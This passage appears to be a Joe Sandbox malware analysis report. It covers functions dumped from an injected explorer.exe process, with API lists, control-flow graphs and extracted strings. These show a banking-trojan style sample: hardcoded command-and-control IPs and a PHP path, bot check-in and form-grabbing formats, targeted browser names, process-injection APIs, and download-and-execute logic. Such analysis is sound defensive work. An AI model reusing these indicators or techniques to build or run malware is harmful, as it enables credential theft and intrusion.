                                                                                                                                                                                                                          Function 0E8B5590 Relevance: 667.9, APIs: 171, Strings: 210, Instructions: 1153libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$.exe$/VzCAHn.php$185.81.68.147$185.81.68.148$:Zone.Identifier$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$bot|%s|%d|%d|%d|%d|%s|%s|%d|%d$chunked$close$closesocket$connect$firefox.exe$form|%s|%s|%d|$form|%s|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                                                                                                                          • API String ID: 2683923594-1492645186
                                                                                                                                                                                                                          • Opcode ID: 8d59903077919d75a48de8f6b3917833d6ddf00dddff58a82a888e902bab9895
                                                                                                                                                                                                                          • Instruction ID: ce43aa0fe60964610626e0678969479dfc616cd6aab3af5d6e2fd2311c197f12
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d59903077919d75a48de8f6b3917833d6ddf00dddff58a82a888e902bab9895
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED032838602FC1D9EA818B52FC9839573A9B749B91F509A76C88D63736EF39C198C740
                                                                                                                                                                                                                          Function 0E8B17F0 Relevance: 86.0, APIs: 35, Strings: 14, Instructions: 267stringfilethreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                          • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$B8IH$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$taskmgr.exe$trusteer
                                                                                                                                                                                                                          • API String ID: 3240663557-3061648580
                                                                                                                                                                                                                          • Opcode ID: 99ad222673ba694320bb615da2a5c6662173702eac1b7259930a67c36a373a93
                                                                                                                                                                                                                          • Instruction ID: 1afe5b82a86e3de362014699e2e991023637a5a550e89fe2220e1ecbb6841d92
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ad222673ba694320bb615da2a5c6662173702eac1b7259930a67c36a373a93
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65C19232205B8586EB10DF66EC643A973A1F789B88F404925DE4E5BB68DF7CC549CB40
                                                                                                                                                                                                                          Function 0E8B72C0 Relevance: 72.1, APIs: 40, Strings: 1, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 386 e8b72c0-e8b7384 call e8c50a0 lstrcpyA lstrcatA * 5 389 e8b73e0-e8b742e lstrcatA WSAStartup 386->389 390 e8b7386-e8b738a 386->390 392 e8b78b5 389->392 393 e8b7434-e8b744f call e8f0820 389->393 390->389 391 e8b738c-e8b73da lstrcatA call e8f0718 lstrcatA * 2 390->391 391->389 395 e8b78bc 392->395 393->395 401 e8b7455-e8b7462 call e8f0828 393->401 398 e8b78bf-e8b78c5 free 395->398 400 e8b78cb-e8b791e closesocket WSACleanup call e8ce010 398->400 401->395 406 e8b7468-e8b74a8 memcpy htons call e8f0838 401->406 406->395 409 e8b74ae-e8b74d3 lstrlenA send 406->409 409->395 410 e8b74d9-e8b74e0 409->410 411 e8b74fa-e8b7531 call e8c50a0 410->411 412 e8b74e2-e8b74f4 send 410->412 415 e8b7540-e8b755b call e8f0848 411->415 412->395 412->411 415->395 418 e8b7561-e8b7564 415->418 419 e8b767a-e8b7689 418->419 420 e8b756a-e8b7573 418->420 419->395 422 e8b768f-e8b7694 419->422 420->419 421 e8b7579-e8b7582 420->421 421->419 423 e8b7588-e8b758f 421->423 422->415 424 e8b7925-e8b792a call e8ce648 423->424 425 e8b7595-e8b75a3 423->425 426 e8b75ca-e8b75df lstrlenA 425->426 427 e8b75a5-e8b75bb lstrcmpiA 425->427 431 e8b7699-e8b76a0 426->431 432 e8b75e5-e8b75fb call e8f07f8 426->432 427->395 430 e8b75c1-e8b75c5 427->430 434 e8b7676 430->434 435 e8b76ac-e8b76ae 431->435 436 e8b76a2-e8b76a4 431->436 441 e8b75fd-e8b7616 lstrcmpiA 432->441 442 e8b7674 432->442 434->419 438 e8b784c-e8b784f 435->438 439 e8b76b4-e8b76e8 malloc 435->439 436->395 440 e8b76aa 436->440 444 e8b789c-e8b78b3 malloc 438->444 445 e8b7851-e8b786c malloc 438->445 443 e8b76f0-e8b770f call e8f0848 439->443 440->439 446 e8b7618-e8b7636 call e8f0808 441->446 447 e8b763e-e8b7650 lstrcmpiA 441->447 442->434 443->398 456 e8b7715-e8b7717 443->456 444->400 449 e8b7870-e8b7883 call e8f0848 445->449 446->395 458 e8b763c 446->458 447->442 453 e8b7652-e8b7670 lstrcmpiA 447->453 454 e8b7889-e8b788b 449->454 453->442 454->395 457 e8b788d-e8b7892 454->457 459 e8b781e-e8b7820 456->459 460 e8b771d-e8b7725 456->460 457->449 461 e8b7894-e8b789a 457->461 458->442 463 e8b7823-e8b782a 459->463 460->459 462 e8b772b-e8b7733 460->462 461->400 462->459 464 e8b7739-e8b7740 462->464 463->443 465 e8b7830 463->465 466 e8b791f-e8b7924 call e8ce648 464->466 467 e8b7746-e8b7778 call e8f0808 464->467 465->398 466->424 467->398 472 e8b777e-e8b7780 467->472 472->398 473 e8b7786 472->473 474 e8b778c-e8b7798 473->474 475 e8b7835-e8b7847 473->475 476 e8b779a-e8b77ae realloc 474->476 477 e8b77b2-e8b77b8 474->477 475->400 476->477 478 e8b77c0-e8b77de call e8f0848 477->478 478->398 481 e8b77e4-e8b77e8 478->481 481->478 482 e8b77ea-e8b7803 call e8f0848 481->482 482->398 485 e8b7809-e8b781c 482->485 485->463
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 4277384649-109466966
                                                                                                                                                                                                                          • Opcode ID: ac0048a8c1b97b5be37f734cf37a3f7532f8c13e2c97d188fb481249bfdad725
                                                                                                                                                                                                                          • Instruction ID: b6bff1fc7d45ea42f6e0bece2a1d691275e1fb91dca6a0cec82c1b10400e8bca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac0048a8c1b97b5be37f734cf37a3f7532f8c13e2c97d188fb481249bfdad725
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF1D431310BC5CADB309F25E8443EA77A1F788B89F449626CA4E97B65DF7AC544C740
                                                                                                                                                                                                                          Function 0E8C51E0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 144stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32 ref: 0E8C5282
                                                                                                                                                                                                                          • InternetCrackUrlA.WININET ref: 0E8C5297
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcpyA.KERNEL32 ref: 0E8B731E
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B732F
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7343
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7357
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7368
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B737C
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B739A
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: wsprintfA.USER32 ref: 0E8B73B2
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B73C6
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B73DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrcatA.KERNEL32 ref: 0E8B7416
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: WSAStartup.WS2_32 ref: 0E8B7426
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: socket.WS2_32 ref: 0E8B7442
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: gethostbyname.WS2_32 ref: 0E8B7459
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: memcpy.MSVCRT ref: 0E8B7479
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: htons.WS2_32 ref: 0E8B7488
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: connect.WS2_32 ref: 0E8B749F
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: lstrlenA.KERNEL32 ref: 0E8B74B5
                                                                                                                                                                                                                            • Part of subcall function 0E8B72C0: send.WS2_32 ref: 0E8B74CB
                                                                                                                                                                                                                          • PathFindFileNameW.SHLWAPI ref: 0E8C531C
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32 ref: 0E8C5336
                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32 ref: 0E8C534C
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8C535C
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8C5368
                                                                                                                                                                                                                          • CreateFileW.KERNEL32 ref: 0E8C5391
                                                                                                                                                                                                                          • WriteFile.KERNEL32 ref: 0E8C53B6
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C53C5
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8C53CE
                                                                                                                                                                                                                          • ShellExecuteW.SHELL32 ref: 0E8C53FC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0E8C540B
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C5416
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                          • String ID: B8IH$open
                                                                                                                                                                                                                          • API String ID: 3619236930-2402625326
                                                                                                                                                                                                                          • Opcode ID: 7ad832edc24f0e499001a067034fa4c443532b192f0a6fea87c3cbcc4a0b7810
                                                                                                                                                                                                                          • Instruction ID: 1373355e1431d346519ae234ccd0a5b6ab436c11d6248a24f521029830d14491
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ad832edc24f0e499001a067034fa4c443532b192f0a6fea87c3cbcc4a0b7810
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27518072714A808AFB10CF66ED543AE77A0F789B88F448825DE4E97B68DF78C545CB40
                                                                                                                                                                                                                          Function 0E8C5570 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32 ref: 0E8C5629
                                                                                                                                                                                                                          • GetComputerNameW.KERNEL32 ref: 0E8C5643
                                                                                                                                                                                                                            • Part of subcall function 0E8BF480: WideCharToMultiByte.KERNEL32 ref: 0E8BF4C3
                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32 ref: 0E8C566C
                                                                                                                                                                                                                          • GetVersionExA.KERNEL32 ref: 0E8C567D
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 0E8C56CD
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: EnterCriticalSection.KERNEL32 ref: 0E8B9498
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: RtlInitializeCriticalSection.NTDLL ref: 0E8B94A5
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94FD
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B950D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B951D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: LeaveCriticalSection.KERNEL32 ref: 0E8B95A4
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: memcpy.MSVCRT ref: 0E8B95BC
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrlenA.KERNEL32 ref: 0E8B95CA
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8C56E1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                          • String ID: 2.1$B8IH
                                                                                                                                                                                                                          • API String ID: 2800961625-2388526469
                                                                                                                                                                                                                          • Opcode ID: 548dfce6f61ac98489f05572c49c3bf2591e801de7b04bdd32ccd213bb45216d
                                                                                                                                                                                                                          • Instruction ID: e14ac091475d059a321301b67e7c7df505886899087f8f074bf32429578130e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 548dfce6f61ac98489f05572c49c3bf2591e801de7b04bdd32ccd213bb45216d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94418032714AC0CAEB20DF65E8543DEB7A4F788788F808415EA4D97B58EF78C645CB41
                                                                                                                                                                                                                          Function 0E8B88B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 849 e8b88b0-e8b88dd call e8cbfbc 852 e8b88e3-e8b88f3 call e8cbfd4 849->852 853 e8b89b6-e8b89cd call e8ce010 849->853 856 e8b88f8-e8b88fa 852->856 858 e8b89ad-e8b89b0 call e8e0040 856->858 859 e8b8900-e8b8905 856->859 858->853 860 e8b890b-e8b8915 call e8e01a0 859->860 861 e8b8990-e8b89a7 Thread32Next 859->861 860->861 865 e8b8917-e8b8921 call e8e01a8 860->865 861->858 861->859 865->861 868 e8b8923-e8b8929 865->868 869 e8b892b-e8b894d HeapAlloc 868->869 870 e8b8951-e8b8957 868->870 869->858 871 e8b894f 869->871 872 e8b8959-e8b8973 call e8e0190 870->872 873 e8b8980-e8b898d 870->873 871->873 872->858 876 e8b8975-e8b897d 872->876 873->861 876->873
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 3234909527-109466966
                                                                                                                                                                                                                          • Opcode ID: 8feb2644561010b961152437857cd8564b3064406f8d9a6e20686534e0cc2a88
                                                                                                                                                                                                                          • Instruction ID: 232c43aee23c69a765c90bd0576b94444a0cecf9fd2376cd567b0871b0dbcf37
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8feb2644561010b961152437857cd8564b3064406f8d9a6e20686534e0cc2a88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43318431205A80C7EF24CF25E454359B3A5F789B98F488A25DA9D87798DF38C945CF42
                                                                                                                                                                                                                          Function 0E8B7B10 Relevance: 4.6, APIs: 3, Instructions: 102memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2622297391-0
                                                                                                                                                                                                                          • Opcode ID: 9376aa2f0c253af331e9382ad1490ff95537631666a6fae9671663dacc052423
                                                                                                                                                                                                                          • Instruction ID: 8fe9362383503291a4c4567b251cf388433fd93d95472b049527ac3405c588b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9376aa2f0c253af331e9382ad1490ff95537631666a6fae9671663dacc052423
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48318331706B4485EF118F16E42039A76A1F789FD4F088636DE5D9BB58EF3EC8418B40
                                                                                                                                                                                                                          Function 0E8CB410 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                          • String ID: B8IH$brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 936357808-156683969
                                                                                                                                                                                                                          • Opcode ID: ca7cf2f7333e9c74630c9c8955ded9afe126b29924dd5ef945dd6746575d4bbb
                                                                                                                                                                                                                          • Instruction ID: 03b7f13c33ee138071c8650d4b274859c8d52e1083f48ef7662f208fe31e3c6a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca7cf2f7333e9c74630c9c8955ded9afe126b29924dd5ef945dd6746575d4bbb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC418F20210A8182EB54EF75FC503AA63E4FB86784F84AC6AC94ED7368EF7DC544C752
                                                                                                                                                                                                                          Function 0E8BF170 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8BF040: GetWindowsDirectoryW.KERNEL32 ref: 0E8BF093
                                                                                                                                                                                                                            • Part of subcall function 0E8BF040: GetVolumeInformationW.KERNEL32 ref: 0E8BF0E2
                                                                                                                                                                                                                            • Part of subcall function 0E8BF040: wsprintfW.USER32 ref: 0E8BF144
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32 ref: 0E8BF1D5
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF1E5
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF1F3
                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32 ref: 0E8BF1FE
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 0E8BF20C
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF21C
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF22A
                                                                                                                                                                                                                          • lstrcatW.KERNEL32 ref: 0E8BF23A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe$B8IH
                                                                                                                                                                                                                          • API String ID: 1846285901-961851852
                                                                                                                                                                                                                          • Opcode ID: 9ec7a06dd3bee4f417e31b6d81151dd5dc19d44b86899af2f6cd87a0b36f0899
                                                                                                                                                                                                                          • Instruction ID: a1e893c7a4240635dd57c439305020337fa5722d13ad3fd57cc82bc14255d886
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ec7a06dd3bee4f417e31b6d81151dd5dc19d44b86899af2f6cd87a0b36f0899
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66213332318B8286EB40DF65F85832D33A1F789784F41A835DA9EA7714EEB8C509CB40
                                                                                                                                                                                                                          Function 0E8C7540 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
